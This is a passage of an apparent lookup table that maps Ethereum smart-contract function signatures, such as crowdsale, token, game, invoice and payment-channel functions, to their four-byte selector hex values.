"0xdecfe0d4", "pots()": "0xa654cfab", "HelperPortion()": "0x5bd489e1", "icoEtherReceived()": "0xf21632e1", "millCap()": "0x9bb6831f", "HARDCAP_TOKENS_PRE_ICO()": "0x3a752c31", "aragonDevMultisig()": "0xc9a2ab19", "bonusWindow1EndTime()": "0x36285df7", "whiteListEndBlock()": "0x5efd3c41", "releaseCount()": "0xb8d08db2", "normal_trade_date()": "0xf0869641", "PUBLIC_SALES_SPECIAL_USERS_RATE()": "0x67cd5323", "transferCooldown()": "0x68f16293", "currentMinter()": "0x9bac6e8d", "bonus01End()": "0xf3ed064a", "coinunits()": "0x9ba11c0a", "crowdsaleInit()": "0xb38fb813", "vote02YesCount()": "0x07f5888b", "gameDuration()": "0xe1f0c376", "setPriceCoolingPeriod()": "0xa4eba44d", "totalEtherCollected()": "0xc7a02061", "noRoundMiniGame()": "0xde8bf3b6", "getBuilding()": "0xdbd3100e", "getEndDate1()": "0xbc655f54", "expectedWinnersCount()": "0x0fd58d07", "legendary()": "0xf739c261", "etherFeeMin()": "0x2f668c5c", "yoobaTeamAddress()": "0xe17a5894", "AppicsFund()": "0xdb201648", "feeForTheStakingInterval()": "0x8cac5f55", "getCompanyAddress()": "0x3944615c", "nextDerivativeTokenScheduled()": "0x5d7a6b10", "companyShare()": "0xefa08854", "limitedWalletsManager()": "0x44e7faa4", "founder2Wallet()": "0xf5023de9", "CLAIM_INTERVAL_DAYS()": "0x7f2f506b", "defaultExpiry()": "0x8cfb3088", "minimalUSD()": "0x675ec1cf", "second_whitelistSupplier()": "0xb84b276d", "numProducts()": "0xac964f21", "ownerTestValue()": "0x0226401d", "policyTokenBalance()": "0x4dfc97c5", "userGrowPoolAddress()": "0x57128ec1", "fatigueBlock()": "0x8ac0e150", "getCountCanAdd()": "0x78c91d29", "drive()": "0xa54580f2", "unitEthWei()": "0x5cb24756", "stage2Bounty()": "0xdeb77083", "milestone()": "0xdbac7806", "pylonSelled()": "0x6f9125a5", "increasePermillage()": "0xc830c656", "HOUR()": "0xa39dc9be", "ICDCap()": "0xf949116d", "dailyGrowthUpdated_date()": "0xc1971240", "SOFTCAP_TIME()": "0x6c4d032e", "ambix()": "0x5a5132be", "pyramid()": "0x250e87c9", "ownerVault()": "0x20e57371", "amountOfTokensPoolB()": "0x6a71df43", "rateFinalStage1()": "0x5343e6a4", "getOnePlayCoin()": "0x79891359", "DOW_WED()": "0x8bbf51b7", "tier_rate_1()": "0xc72a2328", "lastBlock_f3()": "0xd95808f0", "numApis()": "0x53f072e3", "computed_shares_sold()": "0xa21515e3", "communityRoundStartDate()": "0xd1baaf58", "increaseTimeIfBidBeforeEnd()": "0x66aef95b", "founders_2()": "0x49f00964", "unholdTime()": "0xf24818cb", "_price_token_ICO4()": "0xc4eaa978", "getGasPricePctOfBetValue()": "0x8595f8b1", "tokenTransfer()": "0x6c4eca27", "teamSum()": "0xf9a8c5b9", "rewardValue()": "0x12c7df73", "weiMinSalePreIco()": "0xc18d767a", "NETM()": "0x111fba02", "bigbomMultiSigWallet()": "0xa6f07a5c", "GnosisTalk()": "0xcbbc8504", "Oduwacoin()": "0x5da12d50", "teamsWallet()": "0x11e5ea57", "comissionList()": "0x18e536bc", "lastResult()": "0xabcc11d8", "ownerUnpause()": "0x0f861ca3", "scaledRemainder()": "0x7694df16", "TRADING_STARTED()": "0x9ae8ac3c", "treasure()": "0xe520fc7e", "refund(string)": "0xfe5f2e88", "requestTopic(string)": "0xdfbec00e", "getSupportersForTopic(string)": "0xcd03b093", "getTopic(uint256)": "0x71658896", "getTopicCount()": "0xcc89698c", "setMins(uint256,uint256)": "0x4d4af36f", "HOTTO()": "0xddef8f29", "mul16(int16,int16)": "0xa43c49fc", "sub16(int16,int16)": "0x73a077a4", "addint8(int8,int8)": "0x50c7ac75", "setPredictions(int16,string)": "0x180941f0", "_isCorrectQuarterBuyin(uint256)": "0xafd3f79a", "_isCorrectFullBuyin(uint256)": "0x3781afbc", "sendToGiveth()": "0x870baf84", "amendSingleResult(int16,string)": "0xcbaa0bec", "logMatchdayResults(int16,string)": "0xc10c0bd3", "concludeTournament(uint256,uint256)": "0x2eaf81f9", "concludeSeason(int8,uint256,uint256)": "0x7c4a7831", "changeQuarterSeason(int8)": "0x510ef1ce", "claimFullPrize(address)": "0x44261964", "claimSeasonPrize(address,int8)": "0x724a6246", "playerGuess(address,int16)": "0xfb7248cb", "correctResult(int16)": "0xd348ee9a", "playerCurrentlyRegistered(address)": "0x631bdb63", "calculateSeasonScore(address,int8)": "0xa9293efe", "calculateSubscore(address,int16,int16)": "0xe608ca67", "showPlayerSeasonScores(address,int8)": "0xe0018f2f", "showPlayerFullScores(address)": "0xb3803956", "makePredictions(int16,string)": "0x77fd347a", "logNewPlayer(address)": "0x4b504ecd", "registerQuarterSeason(int8)": "0x8fee7b57", "registerFull()": "0xcec68824", "Acentiex()": "0x448f8c86", "StefyToken()": "0xbc60ac60", "checkReferalLink(uint256)": "0x88116d13", "Dandy()": "0x32d80490", "LineToken2()": "0x9d6f78c1", "batchTransferETHS(address[],uint256[])": "0x2969b226", "batchTransferTokenS(address,address[],uint256[])": "0xe0004f43", "NeuralToken()": "0xcc1c0937", "ECCToken(uint256,string,string)": "0xff89a720", "distributeVLD(address[],uint256,uint256)": "0x94bacfef", "Valdela()": "0xe177b707", "STL(uint256,string,string)": "0x059c00be", "CHECKgamberOne()": "0x9fd8c361", "CHECKgamberTwo()": "0x31b36c45", "getUserTokenInfo(address)": "0xd31b3320", "getUserAccountInfo(address)": "0x0cc06221", "userTokenStats(address,address)": "0xac60bbca", "userWalletTokenBalances(address)": "0x619e6e7c", "getUserWalletTokenBalance(address,address)": "0xb2be8a0d", "getUserAccountTokenBalance(address,address)": "0x0eeb63b9", "claimForDeposit(address,address)": "0xb64c1e7e", "getNotUsedToken_()": "0xdbc2ef49", "editTokensForHour(uint256)": "0x6f13b95d", "useTokens(address,address,uint256,uint256)": "0xa49545ec", "addBonusToClient(address,address,uint256,string)": "0xbc81786f", "getProjectClient(uint256)": "0xb9727dc2", "getProjectHour(uint256)": "0xa3743afc", "addHourToProject(uint256,uint256)": "0x8db783ce", "outProjectBinding(uint256,address,address)": "0x66e61a31", "addClient(address,address)": "0x16691869", "Loyalty()": "0xcaba203d", "notUsedToken()": "0x09db5d29", "setLifToken(address)": "0xf2f0967b", "editInfo(string)": "0x9d9b5342", "_editInfoImpl(string)": "0xc5e290cd", "getHotelsByManager(address)": "0xbb979c3d", "getHotels()": "0x0d2e677a", "getHotelsLength()": "0xca63a55b", "callHotel(address,bytes)": "0x154d56db", "deleteHotel(address)": "0xfb6f6875", "registerHotel(string)": "0xf88a067f", "BCALAttToken()": "0x4eeedef1", "verifyGame(uint256,bool)": "0x6aabd369", "isGameExpired(uint256)": "0x65b3a7ca", "isGameVerified(uint256)": "0x926bd180", "getExpiryTime()": "0x25cb5bc0", "verifyGame(bool)": "0x9b59ffd7", "isVerified()": "0x80007e83", "ACasadiAmiciToken()": "0x59b8d74e", "ZJMToken(address,address)": "0xb0321d45", "PSCN()": "0x57987d38", "createNewCE(bytes32)": "0x41829445", "getWalletSetting()": "0x16dabbf6", "getOwnerInfoByIndex(uint256)": "0x66901efb", "getOwnersCount()": "0x73ff81cc", "addTransaction(address,uint256,uint256,string,bytes)": "0xe321192b", "isApproveConfirm(uint256)": "0x532fb092", "isNotExpired(uint256,uint256)": "0xe052a587", "approveTransaction(uint256,uint256,string)": "0xdfe4c261", "sendTransaction(address,uint256,uint256,string,bytes)": "0xcda6e92a", "join(address,string,string)": "0xdd5891b3", "MultiSigWallet(address,string,uint256,uint256,string)": "0xf74deae3", "epm_system()": "0x565a7c4c", "DiligenceToken()": "0x40b0c3d1", "ActiveSCO(bool,uint256)": "0x581a3aea", "Remainder(uint256)": "0x37f26746", "Bonus(uint256)": "0x6356cdac", "INBETToken()": "0x6c94d0e4", "dealContract(uint256,string,uint256,uint256,string)": "0x4236b312", "addJobContractFeedback(uint256,string,uint8)": "0x01ef6cad", "EthlanceFeedback(address)": "0x273fd520", "unregisterEmployee(address)": "0xf97b392a", "registerEmployee(address)": "0x5786a552", "cancelUpgrade()": "0x55f29166", "upgradeDuties()": "0x4e2c9524", "scheduleUpgrade(address,string,string,bytes32,uint256)": "0xea23c473", "disallow(address)": "0xa9ed9cb8", "allow(address)": "0xff9913e8", "test_mixValidEqBytes32Message()": "0x98ecd12c", "test_fourInvalidEqBytes32Message()": "0x4c44d53f", "test_threeInvalidEqBytes32Message()": "0xc6a0eb24", "test_twoInvalidEqBytes32Message()": "0x0b6f0530", "test_oneInvalidEqBytes32Message()": "0xf640b81e", "test_oneInvalidEqBytes32()": "0x22dbaf75", "test_fourValidEqBytes32()": "0x978dabbe", "test_threeValidEqBytes32()": "0xf0b32c69", "test_twoValidEqBytes32()": "0x3538b9db", "test_oneValidEqBytes32Message()": "0x689786d0", "test_oneValidEqBytes32()": "0x1008737d", "testInitialBoardUsingDeployedContract()": "0x45bf5cb2", "buyOfferedStakes(address,address)": "0x16d6be4c", "sellStakes(address,address,uint256,uint256)": "0x4000601f", "checkFunderAccount(address,address)": "0xf8407634", "buyStakes(address,address)": "0x5fe772c6", "createAsset(address,uint256)": "0xdb136b1e", "StakeObjects()": "0x90888aa1", "majorEventFunc(uint256,bytes32,bytes32)": "0xeafb704f", "createMarriage(bytes32,bytes32,uint256,bytes32,bytes32)": "0x1158f696", "getProps()": "0xec1893b4", "getNumProps()": "0x7141856d", "getWeightedVote(bytes20,uint256)": "0x01cb0261", "getVoted(uint256)": "0xaa33ab1b", "setTime(uint256,uint256)": "0xa0355eca", "withdrawBid()": "0x37271cc7", "setAsRefunded(address,uint256,uint256)": "0xf5042801", "isSponsorshipRefunded(address,uint256)": "0x66cab1f3", "getSponsorshipUser(address,uint256)": "0x07621038", "getSponsorshipProportionalAmount(address,uint256,uint256)": "0xd80ad1ed", "getSponsorshipsAmounts(address,uint256[])": "0x091e3f60", "getSponsorshipAmount(address,uint256)": "0x47028fcf", "addJobSponsorship(address,address,uint256,string,string,uint256)": "0xb44cac23", "getJobSponsorshipId(address,address,uint256)": "0xe1c0669d", "getSponsorshipCount(address)": "0xb98d49a5", "verifyTx()": "0x6dae022f", "verifyingKey()": "0x7950c5f8", "pair()": "0xa8aa1b31", "testMul()": "0xe10fb98f", "P2()": "0x30332aea", "P1()": "0x1de21b76", "finalizeCrowdfunding()": "0x1ed692c0", "LunyrToken(address,address,uint256,uint256)": "0xc1e6102b", "LUNVault(address)": "0xa98902e9", "relent()": "0x454052ea", "swipeHoney()": "0x60035c3f", "setTrap(uint256)": "0xc6f981d7", "HoneyBadger(address)": "0xb1d45fad", "isExpired()": "0x2f13b60c", "expireIfNecessary()": "0xbdeb45b8", "hasRequiredSignaturesToValidate()": "0x9bd695b0", "markAsReceived()": "0x089dc937", "canSign()": "0xb54430ce", "getSignatures()": "0xad6f80ff", "getExportingParty()": "0x340adb29", "getImportingParty()": "0x6455780c", "completedAddingParsels()": "0x1fa4d9de", "addParsel(uint256,uint256,address[])": "0x74ccf06f", "getParticipants()": "0x5aa68ac0", "getParticipantDestination()": "0xbbbc67d0", "getParticipantSource()": "0xc7e73adf", "getParticipantOriginWithIndex(uint256)": "0x11cb0bcf", "getNumberOfParticipantsOrigins()": "0x2d80bc86", "Certificate(address,address,address,address,address)": "0x4358630f", "test_CampaignRulesFail()": "0x91bf9c50", "test_campaignRules()": "0xbab42b54", "transferDepositsToNewDao(address)": "0xb48bc2ee", "replaceChannelContractAddress(address)": "0x93080cd4", "addController(address,bool)": "0xb3508654", "getController(uint256)": "0x58edaa9c", "ControllerManager()": "0x161b9f5e", "RegisterDrupal()": "0x1ac25a81", "contractExists()": "0x06ae9483", "validateUserByHash(bytes32)": "0x2573ce27", "newUser(bytes32)": "0xf845862f", "accountCreated(address,bytes32,int256)": "0x111b72c3", "updateLocation(string,string)": "0xf6ddac74", "getPerson()": "0x8ec4dc95", "hashBiometricTemplates(string,int256,string,string)": "0x750f7daf", "RefID(string,string)": "0xe2869853", "modifyOwner()": "0xade60e9a", "findDispute(address)": "0xba0cf581", "getProcessablesSize()": "0x27dba183", "remainingTotalBonuses()": "0xc45330b4", "disapprove()": "0xdcde0019", "add(address[],uint256[])": "0x2315550e", "construct(uint256)": "0xff262ea5", "construct()": "0x94b91deb", "doSplit()": "0x38fdba18", "providerAllowance(address,bool)": "0x40f81cb5", "tokenSaleHasFinished()": "0xd4bdb879", "getAnyAddressTokenBalance(address,address)": "0x6f43233a", "tokenSaleTokenBalance()": "0x8963c04b", "thisContractAddress()": "0x1834906c", "IMEXToken()": "0x3fa8543a", "UnityToken(address,uint256)": "0x3260db59", "getAdvancedTransfer(bytes32,uint256)": "0xa4938313", "AdvancedDeposit(bytes32,uint256)": "0xa80498f1", "ToukenToken()": "0x64e2fdfa", "safediv(uint256,uint256)": "0xf1d18a42", "safemul(uint256,uint256)": "0x9b092f73", "Hungrify()": "0x6daf0866", "reorganize(uint256,address)": "0x16da7d91", "findEmptyBenefactorIndex()": "0xfef7d5a8", "findLowestBenefactor()": "0x7acf16c3", "setPrices(uint256,uint256,uint256,uint8,uint256,uint256,uint256)": "0x8f1df4f7", "getfrom(address)": "0xe987cc45", "getnum(uint256)": "0xdbbabdfe", "candyuser(address,address,uint256)": "0x3d1ced2b", "getcanuse(address)": "0x332559d3", "getaddtime(address)": "0x32eb5e44", "reducemoney(address,uint256)": "0xa393fb0f", "addmoney(address,uint256)": "0x5f2e8493", "clearSums()": "0xfcbcf436", "insertSums(uint256)": "0x9f8c7c4c", "clearAddresses()": "0x01326c34", "insertAddress(address)": "0x1f130d1f", "getNumElements()": "0x5f167276", "getNumSums()": "0x349a1f03", "getMyStake()": "0x5499dca5", "getAllGameAmount()": "0x08ac320e", "getNumberOfPlayers()": "0xfd6673f5", "getGameNumber()": "0xde7d4fc4", "getGameSums(uint256)": "0x85a34f4a", "getGameAddresses(uint256)": "0x7e0d149e", "getTotalAmount()": "0x65ac4341", "getGameEnd()": "0x6cfc4ac5", "getGameBegin()": "0x82de6df7", "myEarnings()": "0xffe6bbd8", "chooseRandomNumber()": "0x622dda96", "setLongAirdropPicker(address)": "0x4d3a01b1", "Zhennong(address)": "0xc090da1e", "sendIndividualAmount(address[],uint256[])": "0xd619f6b3", "XfiniteAsset()": "0x5e3e37d1", "XMPToken()": "0xd96a8687", "removeCustody(address,uint256)": "0x6aa3141f", "addCustody(address)": "0x95932df3", "ModuleToken(uint256)": "0x379c5d3f", "VnixNetwork()": "0xf8a47213", "YBVToken()": "0xda94e770", "TonCoin()": "0x0242f1ef", "min256(uint256,uint256,uint256)": "0x6f32a937", "allocateExtraTokens(address)": "0xd1d566cf", "contribute(address,uint256,uint256,bytes)": "0x58bafdbc", "checkWhitelisted(bytes32,bytes)": "0xeac5a89d", "invalidateHashes(bytes32[])": "0xedacfd25", "withdrawalToken()": "0x5188875b", "closeBuy(bool)": "0xd4e17e6d", "AJDToken()": "0x08cb2e7e", "DSVCoin()": "0x7d7452aa", "getSeedsSinceLastEvent(address)": "0x6e4eb9cb", "getMySeeds()": "0x600e0ee7", "getTotalOut(address)": "0xc91fc619", "getTotalIn(address)": "0x652d38fc", "getMyTomatoes()": "0xb6a7b42c", "setStartingSeeds(uint256)": "0x06e3a700", "getFreeSeeds()": "0xe69932e5", "setNeedToGetFree(uint256)": "0x74af10cf", "setGetFree(bool)": "0xda00a1f4", "setTIME_TO_MAKE_TOMATOES(uint256)": "0x3b84bec7", "calculateSeedBuySimple(uint256)": "0xe04d5105", "calculateSeedBuy(uint256,uint256)": "0x94d127a8", "calculateSeedSell(uint256)": "0x275b6eb0", "buySeeds()": "0x01a88f7d", "getGamers()": "0x0d2e017b", "sellSeeds()": "0x196e5c46", "makeTomatoes(address)": "0x32366fb9", "withdrawByFoundation(address,uint256)": "0x2d29953f", "withdrawByTeam(address,uint256)": "0x4603032a", "getAllowedAmountByTeam()": "0xf7ad7d8f", "transferBountyTokens(address[],uint256[])": "0xc2e46379", "withdraw_4()": "0xbb3b2a35", "withdraw_3()": "0x381a730e", "withdraw_2()": "0x3083a4f9", "withdraw_1()": "0xc035340c", "setEthToBeClaimed()": "0x6048e89e", "thisContractBalance()": "0x2808c8ad", "enableLockFlag(bool)": "0xac4fb219", "helpWithdrawal(address)": "0xc956d497", "depositVault(uint256,uint256)": "0x95f382bc", "referralPay(uint256)": "0x05cb177a", "referralName(string)": "0xe8c23649", "Fenerbahce()": "0x41e0b5d4", "GunChain()": "0xb6e087d6", "GMC()": "0x6f3bf6ea", "fundoShares(uint256)": "0x9a2dcadf", "funComputeRoundPrice()": "0xbb440b82", "funComputeRoundTime(uint256)": "0x82a90545", "withdrawlOwner()": "0x7b3ed808", "doStart()": "0x79d303ae", "setwinnerLimit(uint8)": "0x2139c2aa", "isGameEnd()": "0xa78deefa", "attackCountry(uint8)": "0x7bba0613", "buyCountry(uint8)": "0x0b1dcc88", "Risk()": "0x5f429ba5", "donateJackpot()": "0x4ec4878b", "updateTokenURIPrefix(string)": "0x35f067cf", "overflow()": "0x004264c3", "TravellingFreeToken(uint256,string,uint8,string)": "0x28df7755", "TT()": "0xd237a427", "setSlogan(uint256,bytes)": "0x411ae567", "createItem(uint256,uint256)": "0xadae08dd", "newPrice(uint256,uint256)": "0x13429e31", "setNewPriceFuncAddress(address)": "0xe1ca8b57", "aSetProportion(uint16)": "0xfca865dd", "getSystemAvaliableState()": "0x37aff76d", "gSetAlive(bool)": "0x7e4f9397", "gSetRunning(bool)": "0x95ecef72", "fundMark(uint256)": "0x7227c5dd", "fundWithdraw(address,uint256)": "0x46eba0c1", "fundChecking()": "0x4158d848", "myRole()": "0x067a6b05", "rSetE(address)": "0x3f7d72d8", "rSetA(address)": "0x5798d5bc", "U()": "0x2688454a", "getValidDurationNonce()": "0x5ff6b342", "getAddTokenNonce()": "0xe08b63ad", "AcceleratorStart()": "0x5821c831", "LIFEFORM()": "0x43d6ec16", "TokenFactory(address,address)": "0x218e767d", "_createWonder(address)": "0xd7df7ef9", "purchaseWonder(uint256)": "0xf2edb7c7", "cancelWonderSale(uint256)": "0xfd7feb35", "sellWonder(uint256,uint256)": "0xaa7abc8d", "createWonderNotAuction(string)": "0x4db0040e", "startWonderAuction(string,address)": "0xaf0def14", "updateTokenUri(uint256,string)": "0xd31af484", "bidOnWonder()": "0xc36851bc", "PeakAssetCoin()": "0x333a653e", "DroneToken(uint256,string,string)": "0xc0c620d2", "removeEligibleBurner(address)": "0x7c47df2f", "addEligibleBurner(address)": "0x3e087d01", "YTC()": "0xbb3d9326", "WithdrawalofFunds(uint256)": "0x8c1ab426", "AddAdrJullarTeam(address,address)": "0x36840423", "NewStage(uint256,string,string,uint256)": "0x399c6f55", "StartNextStage()": "0x1e629a75", "JullarCrowdsale()": "0x1e27a965", "Validator(string)": "0xec881472", "TKT_TokenERC20(uint256,string,string)": "0xf19eb731", "TestCoin()": "0x410e7b42", "DraftCrowdsale(uint256,uint256,uint256)": "0x6e9a41c3", "TokenRK70Z()": "0x9931a916", "MDCSToken(uint256,string,uint8,string)": "0xe0dd31da", "ZibPay()": "0xa85923aa", "AlfaCoin()": "0x67541efa", "ForeverChain()": "0x98a0bf6e", "BitonlineStore()": "0x26e501a8", "VOCOToken()": "0x1b37cb3e", "Empty()": "0x3db2a12a", "Reissue(uint256)": "0xe76f62cd", "setfees(uint256)": "0x40285ad5", "founder()": "0x4d853ee5", "calcSTQAmount(uint256)": "0xdf8f4376", "STQCrowdsale(address[],address,address)": "0x494c2a0f", "LRCMidTermHoldingContract(address,address)": "0xb8e60467", "EscobarcoinToken()": "0x9f3e1846", "Salt()": "0x401356f1", "_computeOwnerCut(uint128)": "0x04d1b108", "cancelEtherBroAuction(uint256)": "0x3d6bc807", "addEtherBroAuction(uint256,uint128)": "0xecc91c28", "returnIdImage(uint32)": "0x4ad5a68c", "myEtherBrosCount(address)": "0x222cfe94", "myEtherBros(address)": "0x461fd83b", "mintPromoEtherBro(uint16)": "0x7563113b", "mintEtherBro()": "0xfa48b4bf", "_gensGenerate()": "0x98866ead", "_createEtherBro(uint16,address)": "0x301ecf82", "setPreURI(string)": "0xa85aba19", "setPrefix(uint8)": "0x7e266385", "EtherBrosMaker()": "0x7d3c42d2", "LetsfairToken()": "0xa6d6d046", "schedulableAmount()": "0x453e6fa0", "calculateAmountToRelease()": "0x10c3b15f", "SchedulableToken(address,uint256,uint256)": "0x9507b53a", "getCertificateForWallet(address,address,address)": "0x5ed66172", "getCertificate(bytes32)": "0xf333fe08", "revokeCertificate(bytes32)": "0xc6cbc52a", "bindCertificate2Wallet(address,bytes32)": "0x2d416b4d", "addCertificateAndBind2Wallet(address,uint256,bytes32,bytes32)": "0x24a1c1e0", "addNewCertificate(uint256,bytes32,bytes32)": "0xbb013206", "getCA(address,address)": "0x260a54d3", "isCA(address,address)": "0x21180138", "removeCA(address,address)": "0x87a767e3", "addCA(address,address,string,string,string,string,string,string)": "0x2f1766c5", "AmigoCoin()": "0x285dfc1c", "WithdrawlRemainingPAT()": "0x976fcda7", "checkTokenVesting(address,uint256)": "0x958b6f55", "checkUser()": "0xc1562547", "placeorder(uint256,uint256)": "0x483fa94b", "testParamOutOfBoundsFail()": "0x35c40fe3", "testComplexCombination()": "0x4f6de831", "testNot()": "0xe7d5a62b", "testReturn()": "0xe13a7716", "testOracle()": "0xa2152e32", "testBlockNumber()": "0xe970e86d", "testTimestamp()": "0x7e773d9d", "testSender()": "0x6a561cb8", "testLessThanOrEqual()": "0x0b5d1c3d", "testGreatherThanOrEqual()": "0x1ac10d11", "testLessThan()": "0xe6f041c1", "testGreatherThan()": "0x947f996d", "testInequalityAddr()": "0xb9cbbb62", "testInequalityBytes()": "0xef804ead", "testInequalityUint(int256)": "0x95377ad9", "testEqualityBytes()": "0x705fe7c6", "testEqualityAddr()": "0x1d819ef0", "testEqualityUint(int256)": "0xf85905ac", "getUint(int256,address,string)": "0x36527357", "getAddress(address,string)": "0x5283f339", "get(address,string)": "0xfc2525ab", "certified(address)": "0xcc1d4c02", "submitPkgHash(string,string)": "0xcd79f86d", "getCurrentConsensus(string)": "0xac336f7b", "BattleToken(address)": "0x3bf48672", "OwnedMortal()": "0x2553e0cb", "setTotalsContract(address)": "0x4ee0d066", "StorageExample()": "0x67465daf", "resetCounter()": "0xdbdf7fce", "SystemTest()": "0xbcc7900c", "isForwarder()": "0xfd64eccb", "getInvoiceBalance(bytes32)": "0xfded813c", "getInvoiceAmountPaid(bytes32)": "0xf20b93ea", "getInvoiceStatus(bytes32)": "0x5d4626f6", "getInvoice(bytes32)": "0xcb802c8b", "getInvoiceCount()": "0x7d6a59ed", "payInvoice(bytes32,uint256)": "0x62ba4aef", "cancelInvoice(bytes32)": "0xc0aa7e2e", "createInvoice(bytes32,address,uint256,string)": "0x23e7d9b2", "isInvoice(bytes32)": "0x172ac1ea", "registerParticipantAgent(address)": "0xd18063cd", "isSenderRegisteredAgent(address)": "0xefaf8e22", "ParticipantAuthority(string,address)": "0xf1160dc2", "stampOut(address,uint256,uint256)": "0x0bdddb73", "stampIn(address,uint256,uint256)": "0x9ea57930", "getVisaLeft(address,uint256,uint256)": "0x03062183", "getVisaEntered(address,uint256,uint256)": "0x4e5b0d29", "getVisaPrice(address,uint256,uint256)": "0x70cef2b8", "getVisaAmountPaid(address,uint256,uint256)": "0x97af77b8", "getVisaIdentifier(address,uint256,uint256)": "0x0d649f90", "addImmigrationOfCountry(address,uint256)": "0x4c85d2e6", "Immigration(address,address)": "0xa360098f", "CurrencySwap()": "0x19be28ec", "ERC827TokenMock(address,uint256)": "0x4c478b62", "QuotaManager(address)": "0x9f9727ce", "Reverted()": "0x4a5033eb", "testBalanceCanbeWithdrawn()": "0x7ab96fda", "testDepositCanbeWithdrawn()": "0xaecd46db", "testBalanceAfterDeposit()": "0xb43386cd", "testNewAccountHasZeroBalance()": "0x1ebdaf8b", "read()": "0x57de26a4", "revise()": "0xcdf3bc6f", "deletePeerReview(address)": "0xc38e52c0", "deleteOwnPeerReview()": "0xb78c1853", "submitPeerReview()": "0xfdd3ea94", "Paper(string,address,uint256,uint256,address[],address)": "0xaef5ddec", "getProposals()": "0x62564c48", "SampleContract()": "0x1473248d", "SplitPaymentMock(address[],uint256[])": "0xe4578590", "getOneTimePayment()": "0x3c796430", "getOneTimeCostsPaid()": "0x0de6aa7f", "updatePrice(uint256,uint256)": "0x82367b2d", "buyCertificate(uint256)": "0x90c985a1", "initiateCertificate(bool,string,uint256,uint256,uint256,uint256)": "0x5cc41dad", "resolveHTLC(uint256,uint256,uint256,bytes32,int256,bytes32,uint8,bytes32,bytes32)": "0x2ee86973", "updateChannelState(uint256,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x6e995bd9", "withdrawTo(uint256)": "0x93bc96fa", "withdrawFrom(uint256)": "0xe6dad824", "requestClosingChannel(uint256)": "0x0e2916e1", "confirmChannel(uint256)": "0x5becf24c", "openChannel(uint256)": "0xfd85b1a7", "getClosingBlockNumber(uint256)": "0xf270bcda", "getBalanceTimestamp(uint256)": "0x35b643d4", "getToBalance(uint256)": "0x5d2195dc", "getTo(uint256)": "0x8f37a0f9", "getFromBalance(uint256)": "0x69aad305", "getFrom(uint256)": "0xc378ea76", "getStage(uint256)": "0x2e325020", "createChannel(uint256,address,address)": "0x3a8f1585", "getTimestampInSeconds()": "0x6eb305aa", "getSigner(bytes32,uint8,bytes32,bytes32)": "0xf96ddf7a", "getHTLCHash(uint256,uint256,uint256,bytes32,int256)": "0x7c2926a8", "getUpdateHash(uint256,uint256,uint256,uint256)": "0xf3fa2c37", "getHTLCSpendingHash(int256,bytes32)": "0xe8017bb7", "getHTLCSpendingData(uint256,int256,bytes32)": "0xf9ea3a18", "getHTLCInvalidationTimeoutExtension(uint256,int256,bytes32,bytes32)": "0xffe45b14", "assertNotSpent(uint256,int256,bytes32,bytes32)": "0x6f28a853", "assertSignedByBoth(uint256,bytes32,uint8,bytes32,bytes32)": "0xd7cf61d7", "assertHash(bytes32,bytes32)": "0x15f3223c", "assertSaneHTLC(uint256,int256)": "0x09c51b4e", "fallback()": "0x552079dc", "mintTokensByETH(address,uint256)": "0x37f46e7e", "mintTokensByETHExternal(address,uint256)": "0xca1e5bb7", "endSaleDate()": "0xd7d88043", "mintTokensExternal(address,uint256)": "0x9bf6eb60", "setDirectMintAgent(address,int256)": "0x1e81086d", "setMinInvestedLimit(uint256)": "0xa34d9270", "retrieveTokens(address,address)": "0x6341ca0b", "processCallback(bool,address,address,uint256)": "0x44dbc282", "deregisterCallback(address)": "0x4c66326d", "registerCallback(address)": "0xcf1b037c", "setUnlockedAddress(address)": "0xe1d03d11", "fuse()": "0xb04010c6", "IagonToken()": "0xc4b9897b", "getDividends(uint256,uint256)": "0x65975691", "distributeAmounts(address[],uint256[])": "0xa8c310d5", "distribution(address[],uint256)": "0xf3e4877c", "airdrop(address[])": "0x729ad39e", "disableWhitelist(address[])": "0x502dadb0", "enableWhitelist(address[])": "0x9c09c835", "setParameters(uint256,uint256)": "0x884870c7", "TronXtended(uint256,uint256)": "0xe30c7b0a", "NXTokenCoin()": "0x5c5ce16e", "Crowdsale(address,address,address)": "0xa64c7e2a", "TKRToken()": "0x57a83f25", "calculateBonusTokensAmount(uint256,uint256)": "0xfd54fab8", "otherCoinsPurchase(bytes32,uint256)": "0xae7e23cc", "setNewInvestorsList(address)": "0x1e860d43", "setNewEndDate(uint256)": "0xb9e4d098", "setNewStartDate(uint256)": "0x6cc6971b", "setEthUsdRate(uint256)": "0xfb6f93a4", "setNewBeneficiary(address)": "0x2820f454", "initBonusSystem()": "0x5b839dd2", "BonumPreSale(uint256,uint256,address,address,uint256)": "0x220eeab4", "setWhiteListDuration(uint256)": "0x145fa890", "setWalletForTokens(bytes32,address)": "0xc485ac95", "subTokens(bytes32,uint256)": "0x28334e64", "addTokens(bytes32,uint256)": "0xbc0409bf", "setVerificationStatus(bytes32,bool)": "0x60457034", "isWhiteListed(bytes32)": "0xa4c6569b", "isPreWhiteListed(bytes32)": "0x8cbba6cf", "isAllowedToBuy(bytes32)": "0x77cebd89", "isAllowedToBuyByAddressWithoutVerification(address)": "0x2d045780", "isAllowedToBuyByAddress(address)": "0x6983f908", "removeInvestor(bytes32)": "0x88af8ed4", "setInvestorId(address,bytes32)": "0xeb46a11a", "changeManipulatorAddress(address,bool)": "0x30fba22f", "NZD_Omnidollar()": "0xadb848df", "mining()": "0x662fac39", "setMiner(address)": "0x9742ca46", "getForceOffsetBooks(address)": "0x75e88e3a", "getFromAmountBooks(address)": "0xb15fbfe6", "migrateAmountBooks(address)": "0xb791f3bc", "migratingAmountBooks(address,address)": "0xb37f17ee", "transferUnPaidFundAccount(address,uint256)": "0xa3e20d71", "transferXPAAssetAndProfit(address[],uint256)": "0x28a20a2f", "migrate(address)": "0xce5494bb", "setForceOffsetAmount(uint256,uint256)": "0x426365ad", "setFeeRate(uint256,uint256,uint256,uint256,uint256,uint256)": "0xced0d31d", "transferProfit(address,uint256)": "0xa4e02fcc", "burnFundAccount(address,uint256)": "0xd7cd6c13", "getRemainingAmount(address,address)": "0x767eb651", "getLoanAmount(address,address)": "0x8e543a12", "getUsableAmount(address,address)": "0xe429bd8b", "getUsableXPA(address)": "0xa036f0f8", "getClosingLine()": "0xd1376daa", "getHighestMortgageRate()": "0x9dbda902", "getMortgageRate(address)": "0xf1da7e63", "getPunishXPA(address)": "0x6765b49b", "executeOffset(address,uint256,address,uint256)": "0xb65f3bb5", "offset(address,address)": "0x7ec4edbe", "repayment(address,uint256,address)": "0x2f8061d4", "checkWithdraw(address,uint256,address)": "0xa44eda3c", "withdrawXPA(uint256,address)": 